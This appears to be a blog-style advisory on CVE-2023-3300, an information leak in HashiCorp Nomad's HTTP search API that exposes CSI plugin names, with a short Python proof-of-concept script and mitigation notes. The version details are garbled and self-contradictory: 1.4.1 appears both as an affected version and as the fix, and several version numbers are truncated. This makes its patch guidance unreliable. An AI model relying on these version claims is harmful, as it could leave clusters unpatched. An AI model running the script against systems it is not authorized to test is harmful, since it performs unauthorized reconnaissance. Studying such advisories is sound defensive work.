CVE-2023-3300: HashiCorp Nomad and Nomad Enterprise Security Vulnerability that Reveals Names of Available CSI Plugins

HashiCorp Nomad and Nomad Enterprise versions .11. up to 1.5.6 and 1.4.1 contain a security vulnerability (CVE-2023-3300) in their HTTP search API. This vulnerability allows unauthorized users or users without the plugin:read policy to access and reveal the names of the available Container Storage Interface (CSI) plugins.

This post will outline the details of this vulnerability, provide a code snippet demonstrating the exploit, and discuss the necessary steps required to mitigate the issue. Furthermore, we will provide links to the original references and technical details related to this security flaw.

Exploit Details

HashiCorp Nomad is an orchestration platform that is used to manage the deployment and execution of applications across multiple distributed resources. It uses a set of CSI plugins to enable the seamless integration of storage systems with containerized applications. CSI plugins can only be accessed by users with the necessary permissions, as defined in the plugin:read policy.

The HTTP search API implements a search feature that enables users to query the Nomad cluster for various objects. Under normal circumstances, the API would require authorization before granting access to information about the available CSI plugins. However, this security vulnerability (CVE-2023-3300) allows unauthorized users or users without the plugin:read policy to use the HTTP search API and bypass these security checks.

Here is a code snippet demonstrating the exploit

import requests

nomad_api_url = "http://<nomad_server_ip>:<nomad_api_port>/v1/search";

query = {
    "Prefix": "",  # Can be customized to search for specific plugins
    "Context": "plugins"
}

response = requests.post(nomad_api_url, json=query)
plugin_data = response.json()['Matches']['plugins']

for plugin in plugin_data:
    print(f"Plugin ID: {plugin['ID']}, Name: {plugin['Name']}")

This simple Python script sends a search query to the Nomad HTTP search API. If the API is vulnerable, it will respond with the list of available CSI plugins even without authentication or the necessary policy permissions.

Mitigation

The best and most effective way to address this vulnerability is by upgrading your HashiCorp Nomad and Nomad Enterprise clusters. The security issue has been fixed in the following versions:

1.4.1 (for the 1.4.x series)

If you are unable to upgrade your clusters immediately, you can minimize the likelihood of exploitation by:

- Restricting access to the HTTP search API by implementing proper access control and security groups on the Nomad server.

Conclusion

In this post, we have provided an overview of the CVE-2023-3300 vulnerability affecting HashiCorp Nomad and Nomad Enterprise clusters running versions .11. up to 1.5.6 and 1.4.1. This security issue can lead to unauthorized exposure of CSI plugin names via the HTTP search API. We recommend that you immediately upgrade to the latest released versions (1.6., 1.5.7, or 1.4.1) to mitigate this risk and secure your clusters.

Original References

- Nomad Advisory: CVE-2023-3300
- HashiCorp Nomad Security

Timeline

Published on: 07/20/2023 00:15:00 UTC
Last modified on: 07/27/2023 19:22:00 UTC